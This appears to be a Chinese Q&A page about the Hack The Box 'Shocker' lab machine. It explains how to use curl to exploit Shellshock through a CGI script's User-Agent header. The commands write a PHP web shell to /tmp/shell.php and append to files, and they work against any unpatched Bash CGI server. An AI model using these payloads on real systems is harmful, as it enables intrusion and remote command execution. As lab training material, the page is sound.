求助:Hack The Box平台Shocker靶机中curl编辑文件的用法
Shocker靶机中用curl编辑文件的具体方法
在Shocker靶机的Shellshock漏洞利用环节,用curl编辑/写入文件的核心是借助漏洞在请求头中注入执行命令的payload,具体用法如下:
1. 写入新文件
通过curl添加带有Shellshock payload的请求头,执行echo命令将内容写入目标路径:
curl -H "User-Agent: () { :; }; echo '<?php system(\$_GET[\"cmd\"]); ?>' > /tmp/shell.php" http://<目标IP>/cgi-bin/user.sh
- 替换
<目标IP>为Shocker靶机的实际IP /cgi-bin/user.sh是靶机上存在的CGI脚本路径(若扫描到其他可访问的CGI脚本,替换成对应路径即可)- 命令中
echo '内容' > 文件路径的作用是将指定内容覆盖写入目标文件,这里示例写入了PHP一句话木马到/tmp/shell.php
2. 追加内容到已有文件
如果需要向已存在的文件追加内容,将命令中的>替换为>>即可:
curl -H "User-Agent: () { :; }; echo 'echo \"追加的内容\"' >> /tmp/shell.php" http://<目标IP>/cgi-bin/user.sh
注意事项
- 确保目标路径有写入权限,
/tmp目录在大多数Linux系统中默认开放写入权限,是优先选择的路径 - 若payload执行失败,检查CGI脚本是否确实存在、靶机是否开启Shellshock漏洞,以及命令中的特殊字符是否正确转义
内容的提问来源于stack exchange,提问作者s1500
相关产品推荐
相关产品推荐

